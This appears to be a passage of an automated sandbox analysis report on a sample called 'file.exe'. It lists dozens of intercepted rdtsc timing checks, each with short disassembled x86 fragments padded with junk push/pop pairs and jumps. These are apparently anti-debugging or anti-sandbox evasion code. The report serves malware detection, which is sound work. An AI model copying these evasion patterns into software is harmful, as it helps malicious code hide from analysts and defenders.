Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47758 second address: E477A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jmp 00007FDE71263CF0h 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 popad 0x00000016 nop 0x00000017 mov edi, dword ptr [ebp+122D1DF8h] 0x0000001d mov ebx, dword ptr [ebp+12486960h] 0x00000023 mov dword ptr [ebp+122D20BAh], eax 0x00000029 movzx edi, si 0x0000002c add eax, ebx 0x0000002e jnp 00007FDE71263CECh 0x00000034 mov dword ptr [ebp+122D1CB1h], edx 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5195 second address: EA519B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA519B second address: EA519F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA519F second address: EA51E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FDE70D000D5h 0x0000000f push ecx 0x00000010 jmp 00007FDE70D000CCh 0x00000015 jmp 00007FDE70D000D7h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5D6B second address: EA5D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF1h 0x00000009 jns 00007FDE71263CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5D86 second address: EA5D8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEAFC second address: EAEB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEB00 second address: EAEB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FDE70D000C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEB13 second address: EAEB27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE71263CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FDE71263CE8h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACBDF second address: EACBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACBE4 second address: EACC1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE71263CF8h 0x00000008 jmp 00007FDE71263CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FDE71263CE6h 0x00000019 jmp 00007FDE71263CF2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACC1C second address: EACC20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACC20 second address: EACC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE222 second address: EAE23D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D5h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE23D second address: EAE260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 push eax 0x00000008 je 00007FDE71263CE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE4F6 second address: EAE4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE4FC second address: EAE500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE7B7 second address: EAE7BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB29F2 second address: EB29FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB29FC second address: EB2A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D5h 0x00000007 jp 00007FDE70D000C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2A21 second address: EB2A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2CE7 second address: EB2D41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FDE70D000D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FDE70D000C6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FDE70D000CAh 0x00000019 js 00007FDE70D000C6h 0x0000001f popad 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FDE70D000D3h 0x00000028 jmp 00007FDE70D000CCh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2FF1 second address: EB3007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDE71263CEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3007 second address: EB300C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB300C second address: EB3023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF1h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3188 second address: EB318C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB318C second address: EB3192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3192 second address: EB31A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FDE70D000C6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB31A5 second address: EB31AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3302 second address: EB3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB76 second address: EBDB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FDE71263CE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB82 second address: EBDB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB86 second address: EBDB96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FDE71263CE6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB96 second address: EBDBB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FDE70D000E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE70D000CDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDBB3 second address: EBDBC2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE71263CE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDFDC second address: EBDFE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE70D000C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDFE8 second address: EBDFF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FDE71263CE6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE315 second address: EBE335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000CDh 0x00000009 pop eax 0x0000000a jl 00007FDE70D000D2h 0x00000010 je 00007FDE70D000C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE335 second address: EBE351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FDE71263CF4h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE351 second address: EBE355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE631 second address: EBE637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE637 second address: EBE64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE79A second address: EBE79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE79E second address: EBE7DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push ebx 0x0000000d jmp 00007FDE70D000D5h 0x00000012 jc 00007FDE70D000D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE7DB second address: EBE7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE930 second address: EBE937 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE937 second address: EBE946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FDE71263CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEA6D second address: EBEA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FDE70D000C6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF977 second address: EBF9A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE71263CFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e je 00007FDE71263CE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF9A6 second address: EBF9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDE70D000D9h 0x0000000c jmp 00007FDE70D000CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF9D4 second address: EBF9DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE71263CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC2B83 second address: EC2B96 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jno 00007FDE70D000C6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4E35 second address: EC4E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4E3D second address: EC4E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4E43 second address: EC4E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDE71263CECh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97CC second address: EC97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FDE70D000C6h 0x00000012 je 00007FDE70D000C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97E4 second address: EC97E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97E8 second address: EC97EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97EE second address: EC97F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3548 second address: ED354E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED354E second address: ED3579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FDE71263CF3h 0x0000000c jmp 00007FDE71263CEDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3579 second address: ED358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED6823 second address: ED6829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9350 second address: ED9356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9356 second address: ED9361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9361 second address: ED936E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FDE70D000C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED936E second address: ED9376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8D7F second address: ED8D89 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE70D000C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8D89 second address: ED8D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FDE71263CECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8F0B second address: ED8F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB156 second address: EDB15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB15A second address: EDB16A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB16A second address: EDB170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB170 second address: EDB1BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D1h 0x00000007 pushad 0x00000008 jnp 00007FDE70D000C6h 0x0000000e jnc 00007FDE70D000C6h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FDE70D000D0h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007FDE70D000C6h 0x00000027 jmp 00007FDE70D000CDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB1BB second address: EDB1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE71263CF3h 0x0000000e jo 00007FDE71263CF8h 0x00000014 jmp 00007FDE71263CECh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEA412 second address: EEA423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF7C3 second address: EEF7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF7C7 second address: EEF7CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF641 second address: EEF645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6B6A second address: EF6B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6B6E second address: EF6B7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007FDE71263CE6h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6B7C second address: EF6B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FDE70D000C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53C4 second address: EF53CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53CC second address: EF53D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5550 second address: EF556C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEAh 0x00000007 jng 00007FDE71263CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FDE71263CE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF556C second address: EF5572 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5572 second address: EF5582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnc 00007FDE71263CE6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF56EF second address: EF56FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF56FD second address: EF5701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58A8 second address: EF58C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FDE70D000D7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58C4 second address: EF58D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDE71263CE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58D3 second address: EF58D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A38 second address: EF5A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A3E second address: EF5A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FDE70D000C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A4D second address: EF5A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A51 second address: EF5A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A57 second address: EF5AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 jg 00007FDE71263CF9h 0x0000000d jmp 00007FDE71263CF1h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDE71263CEEh 0x0000001f jmp 00007FDE71263CF9h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5AAA second address: EF5ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
